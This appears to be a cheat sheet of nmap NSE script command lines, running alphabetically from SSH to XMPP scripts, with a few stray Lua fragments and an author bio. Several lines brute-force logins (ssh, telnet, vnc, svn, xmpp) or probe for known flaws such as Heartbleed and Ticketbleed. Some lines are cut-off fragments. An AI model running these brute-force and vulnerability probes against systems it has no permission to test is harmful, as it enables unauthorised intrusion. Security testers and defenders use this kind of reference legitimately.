nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=
nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst \
in nmap.registry for use by other scripts. Output can be
nmap host --script ssh-hostkey --script-args ssh_hostkey=full
nmap host --script ssh-hostkey --script-args ssh_hostkey=all
nmap host --script ssh-hostkey --script-args ssh_hostkey='visual bubble'
nmap -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'root', 'user'}, ssh.privatekeys={'./id_rsa1', './id_rsa2'}"
nmap -p 22 --script ssh-publickey-acceptance --script-args 'ssh.usernames={"root", "user"}, publickeys={"./id_rsa1.pub", "./id_rsa2.pub"}'
local publickeydb = stdnse.get_script_args "publickeydb" or nmap.fetchfile("nselib/data/publickeydb")
nmap -p 443 --script ssl-ccs-injection
nmap -p 443 --script ssl-cert-intaddr
nmap --script=ssl-date
nmap --script ssl-dh-params
nmap -sV --script ssl-enum-ciphers -p 443
assert(have_tls, "This script requires the tls.lua library from https://nmap.org/nsedoc/lib/tls.html")
nmap -p 443 --script ssl-heartbleed
nmap --script ssl-known-key -p 443
nmap -sV --version-light --script ssl-poodle -p 443
nmap -sV -PN -sU -p 3478 --script stun-info
nmap --script stuxnet-detect -p 445
nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690
nmap --script targets-asn --script-args targets-asn.asn=32
nmap -6 --script targets-ipv6-map4to6 --script-args newtargets,targets-ipv6-map4to6.IPv4Hosts={192.168.1.0/24},targets-ipv6-subnet={2001:db8:c0ca::/64}
./nmap -6 --script=targets-ipv6-multicast-echo.nse --script-args 'newtargets,interface=eth0' -sL
./nmap -6 --script=targets-ipv6-multicast-invalid-dst.nse --script-args 'newtargets,interface=eth0' -sP
nmap -6 --script=targets-ipv6-multicast-mld.nse --script-args 'newtargets,interface=eth0'
nmap -6 --script targets-ipv6-multicast-slaac --script-args 'newtargets,interface=eth0' -sP
nmap -6 -p 80 --script targets-ipv6-wordlist --script-args newtargets,targets-ipv6-subnet={2001:db8:c0ca::/64}
nmap -sL --script=targets-sniffer --script-args=newtargets,targets-sniffer.timeout=5s,targets-sniffer.iface=eth0
(stdnse.get_script_args("targets-sniffer.iface") or nmap.get_interface())
local interface = stdnse.get_script_args("targets-sniffer.iface") or nmap.get_interface()
local start_time = nmap.clock_ms() -- Used for script timeout
nmap --script targets-traceroute --script-args newtargets --traceroute target
nmap --script targets-xml --script-args newtargets,iX=oldscan.xml
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s
nmap -p 23 --script telnet-encryption
nmap -p 23 --script telnet-ntlm-info
nmap --script=tls-alpn
nmap --script=tls-nextprotoneg
nmap -p 443 --script tls-ticketbleed
nmap --script tn3270-info,tn3270_screen
nmap --script=tor-consensus-checker
nmap --traceroute --script traceroute-geolocation
nmap -p 2401 --script tso-brute
nmap --script=tso-enum -p 23
nmap -sV -p 9923 10.32.70.10 --script tso-enum --script-args userdb=tso_users.txt,tso-enum.commands="logon applid(tso)"
nmap -sU -p 10001 --script ubiquiti-discovery.nse
nmap --script unittest --script-args unittest.run
nmap --script unusual-port
nmap -sU -p 1900 --script=upnp-info
nmap --script uptime-agent-info -p 9998
nmap --script url-snarf -e
local arg_iface = nmap.get_interface() or stdnse.get_script_args(SCRIPT_NAME .. ".interface")
nmap -Pn -sU -sV --script ventrilo-info -p
nmap -p 5019 --script versant-info
nmap -p 902 --script vmauthd-brute
nmap --script vmware-version -p443
nmap --script vnc-brute -p 5900
nmap -p 6666 --script voldemort-info
nmap --script vtam-enum -p 23
nmap --script vtam-enum --script-args idlist=defaults.txt,
nmap -sV --script vulners [--script-args mincvss=]
nmap -sU -p --script vuze-dht-info -sV
nmap -sU -p 17185 --script wdb-version
nmap target --script whois-ip
nmap target --script whois-ip --script-args whodb=nofile
nmap target --script whois-ip --script-args whois.whodb=nofile
nmap target --script whois-ip --script-args whodb=arin+ripe+afrinic
nmap target --script whois-ip --script-args whois.whodb=apnic*lacnic
nmap target --script whois-ip --script-args whodb=nofollow
nmap target --script whois-ip --script-args whois.whodb=nofollow+ripe
nmap target --script whois-ip --script-args whodb=nocache
nmap target --script whois-ip --script-args whois.whodb=nocache
sudo ./nmap --script wsdd-discover
nmap -sU -p 177 --script xdmcp-discover
nmap -p 5222 --script xmpp-brute

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.